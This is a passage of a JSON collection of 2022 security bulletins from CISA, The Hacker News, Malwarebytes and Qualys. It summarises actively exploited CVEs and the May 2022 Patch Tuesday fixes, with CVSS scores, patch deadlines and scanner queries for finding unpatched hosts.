process.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n \nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/01/cisa-adds-one-known-exploited-vulnerability-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability to Catalog ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26931"], "modified": "2022-07-01T00:00:00", "id": "CISA:B55BB602515A4C4A2D3C252B1A8C9767", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/01/cisa-adds-one-known-exploited-vulnerability-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-09-23T16:56:17", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjs8JaMOY9R6lUtMUspyaZkXpTsX4qNnhcrHTL9mWH5ZNa5vmozYX5_wadmPyK4zvGOflysK8-kmfWEodQkGRkX2S6SRc2Rz3Mmc6gZULQMoM1NWsDnbyPfI1hCtqNvHLJGrpMX5ei4CIFAfpq-ihMIXLWrMaa-7Q5NtgXCuo8GX35xntkWn95YjMu2/s728-e100/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday moved to add a [critical SAP security flaw](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/18/cisa-adds-seven-known-exploited-vulnerabilities-catalog>) to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation.\n\nThe issue in question is [CVE-2022-22536](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>), which has received the highest possible risk score of 10.0 on the CVSS vulnerability scoring system and was addressed by SAP as part of its Patch Tuesday updates for February 2022.\n\nDescribed as an HTTP request smuggling vulnerability, the shortcoming impacts the following product versions -\n\n * SAP Web Dispatcher (Versions - 7.49, 7.53, 7.77, 7.81, 7.85, 7.22EXT, 7.86, 7.87)\n * SAP Content Server (Version - 7.53)\n * SAP NetWeaver and ABAP Platform (Versions - KERNEL 7.22, 8.04, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, KRNL64UC 8.04, 7.22, 7.22EXT, 7.49, 7.53, KRNL64NUC 7.22, 7.22EXT, 7.49)\n\n\"An unauthenticated attacker can prepend a victim's request with arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary web caches,\" CISA said in an alert.\n\n\"A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,\" Onapsis, which [discovered](<https://onapsis.com/icmad-sap-cybersecurity-vulnerabilities>) the flaw, [notes](<https://onapsis.com/threat-report/icmad-sap-vulnerabilities>). \"Consequently, this makes it easy for attackers to exploit it and more challenging for security technology such as firewalls or IDS/IPS to detect it (as it does not present a malicious payload).\"\n\nAside from the SAP weakness, the agency added new flaws disclosed by Apple ([CVE-2022-32893 and CVE-2022-32894](<https://thehackernews.com/2022/08/apple-releases-security-updates-to.html>)) and Google ([CVE-2022-2856](<https://thehackernews.com/2022/08/new-google-chrome-zero-day.html>)) this week as well as previously documented Microsoft-related bugs ([CVE-2022-21971](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21971>) and [CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>)) and a remote code execution vulnerability in Palo Alto Networks PAN-OS ([CVE-2017-15944](<https://nvd.nist.gov/vuln/detail/CVE-2017-15944>), CVSS score: 9.8) that was disclosed in 2017.\n\nCVE-2022-21971 (CVSS score: 7.8) is a remote code execution vulnerability in Windows Runtime that was resolved by Microsoft in February 2022. CVE-2022-26923 (CVSS score: 8.8), fixed in May 2022, relates to a privilege escalation flaw in Active Directory Domain Services.\n\n\"An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System,\" Microsoft describes in its advisory for CVE-2022-26923.\n\nThe CISA notification, as is traditionally the case, is light on technical details of in-the-wild attacks associated with the vulnerabilities so as to avoid threat actors taking further advantage of them.\n\nTo mitigate exposure to potential threats, Federal Civilian Executive Branch (FCEB) agencies are mandated to apply the relevant patches by September 8, 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-20T14:19:00", "type": "thn", "title": "CISA Adds 7 New Actively Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15944", "CVE-2022-21971", "CVE-2022-22536", "CVE-2022-26923", "CVE-2022-2856", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-09-23T13:13:33", "id": "THN:221BD04ADD3814DC78AF58DFF41861F3", "href": "https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-08-23T00:02:12", "description": "On Thursday, CISA (the US Cybersecurity and Infrastructure Security Agency) updated [its catalog of actively exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) by adding seven new entries. These flaws were found in Apple, Google, Microsoft, Palo Alto Networks, and SAP products. CISA set the due date for everyone to patch the weaknesses by September 8, 2022.\n\nCVE-2022-22536, an SAP flaw with the highest risk score of 10, is one of the seven. We wrote about it in February, and thankfully, SAP addressed the issue fairly quickly, too, by issuing a patch. CISA even mentioned that if customers fail to patch CVE-2022-22536, they could be exposed to ransomware attacks, data theft, financial fraud, and other business disruptions that'd cost them millions.\n\n[**CVE-2022-32893**](<https://cve.report/CVE-2022-32893>) and [**CVE-2022-32894**](<https://cve.report/CVE-2022-32894>), the two zero-day, out-of-bounds write vulnerabilities affecting iOS, iPadOS, and macOS, continue to [headline](<https://www.malwarebytes.com/blog/news/2022/08/urgent-update-for-macos-and-ios-two-actively-exploited-zero-days-fixed>) as of this writing. These are serious flaws that, if left unpatched, could allow anyone to take control of vulnerable Apple systems. Apple already released fixes for these from the following support pages:\n\n * [About the security content of iOS 15.6.1 and iPadOS 15.6.1](<https://support.apple.com/en-gb/HT213412>)\n * [About the security content of macOS Monterey 12.5.1](<https://support.apple.com/en-gb/HT213413>)\n * [About the security content of Safari 15.6.1](<https://support.apple.com/en-us/HT213414>)\n\nThe Google Chrome flaw with high severity, **[CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>)**, is also [confirmed](<https://www.forbes.com/sites/daveywinder/2022/08/20/google-confirms-chrome-zero-day-5-as-attacks-begin-update-now/>) to be targeted by hackers. As with other zero-days, technical details about it are light, but the [advisory](<https://chromereleases.googleblog.com/2022/08/stable-channel-update-for-desktop_16.html>) states that the flaw is an \"insufficient validation of untrusted input in Intents.\" The [Intents](<https://developers.google.com/assistant/conversational/intents>) technology works in the background and is involved in processing user input or handling a system event. If this flaw is exploited, anyone could create a malicious input that Chrome may validate incorrectly, leading to arbitrary code execution or system takeover.\n\nGoogle already patched this. While Chrome should've updated automatically, it is recommended to force an update check to ensure the patch is applied.\n\nMicrosoft also has patches available for **[CVE-2022-21971](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21971>)** and **[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>)** in February and May, respectively. The former was given an \"exploitation less likely\" probability, but that has already changed--a [proof-of-concept (PoC)](<https://www.malwarebytes.com/glossary/proof-of-concept>) has been available since March. PoC exploits were also made public for the latter Microsoft flaw. However, these were released after Microsoft had already pushed out a patch.\n\nPalo Alto Networks's is the oldest among the new vulnerabilities added to the catalog. Discovered in 2017, **[CVE-2017-15944](<https://nvd.nist.gov/vuln/detail/CVE-2017-15944>)** has a severity rating of 9.8 (Critical). Once exploited, attackers could perform remote code execution on affected systems. You can read more about this flaw on [Palo Alto's advisory page](<https://security.paloaltonetworks.com/CVE-2017-15944>).\n\nMalwarebytes advises readers to apply patches to these flaws if they use products of the companies we mentioned. You don't have to wait for the due date before you act.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-22T15:00:00", "type": "malwarebytes", "title": "CISA wants you to patch these actively exploited vulnerabilities before September 8", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15944", "CVE-2022-21971", "CVE-2022-22536", "CVE-2022-26923", "CVE-2022-2856", "CVE-2022-32893", "CVE-2022-32894"], "modified": "2022-08-22T15:00:00", "id": "MALWAREBYTES:2B7FA24A43BE3D53EA1E393BEC594625", "href": "https://www.malwarebytes.com/blog/news/2022/08/cisa-wants-you-to-patch-these-actively-exploited-vulnerabilities-before-september-8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-05-17T23:29:17", "description": "## **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 75 vulnerabilities in the May 2022 update, including one advisory ( [ADV220001](<https://msrc.microsoft.com/update-guide/vulnerability/ADV220001>)**1** ) for Azure in response to [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29972>), a publicly exposed Zero-Day Remote Code Execution (RCE) Vulnerability, and eight (8) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE) or Elevation of Privileges. This month\u2019s Patch Tuesday release includes fixes for two (2) other zero-day vulnerabilities as well: one known to be actively exploited ([CVE-2022-26925](<http://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26925>)) and the other for being publicly exposed ([CVE-2022-22713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22713>)).\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Remote Code Execution (RCE), Security Feature Bypass, and Spoofing vulnerabilities.\n\n\n\n## Notable Microsoft Vulnerabilities Patched\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>) covers multiple Microsoft product families, including Azure, Developer Tools, Extended Security Update (ESU), Exchange Server, Microsoft Office, and Windows. A total of 97 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, Security Update, and ServicingStackUpdate.\n\nThe **most urgent bug** Microsoft addressed this month is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), a weakness in a central component of Windows security (the \u201cLocal Security Authority\u201d (LSARPC) process within Windows). CVE-2022-26925 has been publicly disclosed and it is now actively being exploited in the wild. \n\n### [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>)** | Windows LSA Spoofing Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10. \n\n_Please note that the combined CVSS score would be 9.8 when this vulnerability is chained with the noted NTLM Relay Attacks on Active Directory Certificate Services (AD CS)._ _Please see [ADV210003 Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) for additional information._\n\nThe vulnerability affects Windows 7 through 10 and Windows Server 2008 through 2022. While this vulnerability affects all servers, domain controllers should be prioritized in terms of applying security updates. After applying the security updates, please see [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) for more information on further steps that you need to take to protect your system. \n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. This security update detects anonymous connection attempts in LSARPC and disallows it.\n\nAccording to the CVSS metric, the attack complexity is high. The attacker must inject themselves into the logical network path between the target and the resource requested by the victim in order to read or modify network communications. This is called a man-in-the-middle (MITM) attack.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n### **[CVE-2022-21978](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21978>) | Microsoft Exchange Server Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.2/10.\n\nSuccessful exploitation of this vulnerability requires the attacker to be authenticated to the Exchange Server as a member of a high privileged group.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22012>)** **and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29130>) | Windows LDAP Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted request to a vulnerable server. Successful exploitation could result in the attacker's code running in the context of the SYSTEM account. \n\nThis vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. Systems with the default value of this policy would not be vulnerable. For more information, please see Microsoft's [LDAP policies](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/3f0137a1-63df-400c-bf97-e1040f055a99>).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n**[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22017>) | Remote Desktop Client Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### **[CVE-2022-26913](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26913>) | Windows Authentication Security Feature Bypass Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.4/10.\n\nAn attacker who successfully exploited this vulnerability could carry out a Man-in-the-Middle (MITM) attack and could decrypt and read or modify TLS traffic between the client and server. There is no impact to the availability of the attacked machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n### **[CVE-2022-26923](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26923>) | Active Directory Domain Services Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-26937**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)** | Windows Network File System Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nThis vulnerability is not exploitable in NFSV4.1. Prior to updating your version of Windows that protects against this vulnerability, you can mitigate an attack by disabling NFSV2 and NFSV3. _This may adversely affect your ecosystem and should only be used as a temporary mitigation._\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-29108**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29108>)** | Microsoft SharePoint Server Remote Code Execution Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nThe attacker must be authenticated and possess the permissions for page creation to be able to exploit this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [**CVE-2022-29133**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29133>)** | Windows Kernel Elevation of Privilege Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nIn this case, a successful attack could be performed from a low privilege [AppContainer](<https://docs.microsoft.com/windows/win32/secauthz/appcontainer-isolation>). The attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely._**\n\n* * *\n\n## Microsoft Last But Not Least\n\nOn April 28, 2022, Microsoft released 36 vulnerabilities for Microsoft Edge (Chromium-based) including [CVE-2022-29144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29144>) which is classified as **_Important, _**and [CVE-2022-29146](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29146>) which is classified as **_Moderate_**. Both flaws are Elevation of Privilege vulnerabilities and have been assigned a CVSSv3.1 score of 8.3/10.\n\nOn May 6, 2022, Microsoft Build announced that there are some [Site compatibility-impacting changes coming to Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/web-platform/site-impacting-changes>) for developers. This article lists differences between the schedule of changes for Microsoft Edge versus the Chromium project, and high-impact changes that the Microsoft Edge team is tracking especially closely.\n\n* * *\n\n## Notable Adobe Vulnerabilities Patched\n\nAdobe released five (5) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 18 vulnerabilities affecting Character Animator, ColdFusion, Framemaker, InCopy, and InDesign. Of these 18 vulnerabilities, 16 are rated as **_Critical_**.\n\n* * *\n\n### [APSB22-21](<https://helpx.adobe.com/security/products/character_animator/apsb22-21.html>)** | Security Updates Available for Adobe Character Animator**\n\nThis update resolves one (1) **_Critical_** vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves a critical vulnerability. Successful exploitation could lead to arbitrary code execution. \n\n* * *\n\n### [APSB22-22](<https://helpx.adobe.com/security/products/coldfusion/apsb22-22.html>)** | Security updates available for Adobe ColdFusion**\n\nThis update resolves one (1) **_Important _**vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released security updates for ColdFusion versions 2021 and 2018. These updates resolve an important vulnerability that could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-23](<https://helpx.adobe.com/security/products/indesign/apsb22-23.html>)** | Security Update Available for Adobe InDesign**\n\nThis update resolves three (3) **_Critical _**vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InDesign. This update addresses critical vulnerabilities. Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-27](<https://helpx.adobe.com/security/products/framemaker/apsb22-27.html>)** | Security Updates Available for Adobe Framemaker**\n\nThis update resolves nine (9) **_Critical _**and one (1)_ **Important **_vulnerability. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Framemaker. This update addresses one important and multiple critical vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leaks.\n\n* * *\n\n### [APSB22-28](<https://helpx.adobe.com/security/products/incopy/apsb22-28.html>)** | Security Update Available for Adobe InCopy**\n\nThis update resolves three (3) **_Critical _**vulnerabilities. \n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InCopy. This update addresses critical vulnerabilities. Successful exploitation could lead to arbitrary code execution. \n\n## About Qualys Patch Tuesday\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50120` OR qid:`91894` OR qid:`91895` OR qid:`91896` OR qid:`91897` OR qid:`91898` OR qid:`91899` OR qid:`91900` OR qid:`91901` OR qid:`91903` OR qid:`91904` OR qid:`91905` OR qid:`91906` OR qid:`110407` OR qid:`110408` OR qid:`376584` )\n\n\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday:\n \n \n ( qid:`50120` OR qid:`91894` OR qid:`91895` OR qid:`91896` OR qid:`91897` OR qid:`91898` OR qid:`91899` OR qid:`91900` OR qid:`91901` OR qid:`91903` OR qid:`91904` OR qid:`91905` OR qid:`91906` OR qid:`110407` OR qid:`110408` OR qid:`376584` )\n\n\n\n* * *\n\n## \nQualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. \n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)\n\n* * *\n\n**1** Please visit [Qualys Threat Protection Blog](<https://threatprotect.qualys.com/2022/05/10/microsoft-releases-patch-for-the-third-party-odbc-driver-remote-code-execution-vulnerability-cve-2022-29972/>) for additional information about Microsoft Advisory ADV220001.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T19:29:16", "type": "qualysblog", "title": "May 2022 Patch Tuesday | Microsoft Releases 75 Vulnerabilities with 8 Critical; Adobe Releases 5 Advisories, 18 Vulnerabilities with 16 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21978", "CVE-2022-22012", "CVE-2022-22017", "CVE-2022-22713", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26937", "CVE-2022-29108", "CVE-2022-29130", "CVE-2022-29133", "CVE-2022-29144", "CVE-2022-29146", "CVE-2022-29972"], "modified": "2022-05-10T19:29:16", "id": "QUALYSBLOG:7BB591052411447A2B315456D50D258C", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-05-30T13:56:46", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for May 2022. Sorry for the delay, this month has been quite intense. As usual, I'm using my [Vulristics](<https://github.com/leonov-av/vulristics>) project and going through not only the vulnerabilities that were presented on May 10th, but all the MS vulnerabilities presented by Microsoft since the previous Patch Tuesday, April 12th. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239089>\n\nI have set direct links in comments_links.txt for Qualys, ZDI and Kaspersky blog posts.\n \n \n $ cat comments_links.txt\n Qualys|May 2022 Patch Tuesday: Microsoft Releases 75 Vulnerabilities with 8 Critical; Adobe Releases 5 Advisories, 18 Vulnerabilities with 16 Critical|https://blog.qualys.com/vulnerabilities-threat-research/2022/05/10/may-2022-patch-tuesday\n ZDI|THE MAY 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/5/10/the-may-2022-security-update-review\n Kaspersky|Actively exploited vulnerability in Windows|https://www.kaspersky.com/blog/windows-actively-exploited-vulnerability-cve-2022-26925/44305/\n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"May\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n ...\n MS PT Year: 2022\n MS PT Month: May\n MS PT Date: 2022-05-10\n MS PT CVEs found: 73\n Ext MS PT Date from: 2022-04-13\n Ext MS PT Date to: 2022-05-09\n Ext MS PT CVEs found: 38\n ALL MS PT CVEs: 111\n ...\n\nLet's see the report.\n\n * All vulnerabilities: 110\n * Urgent: 0\n 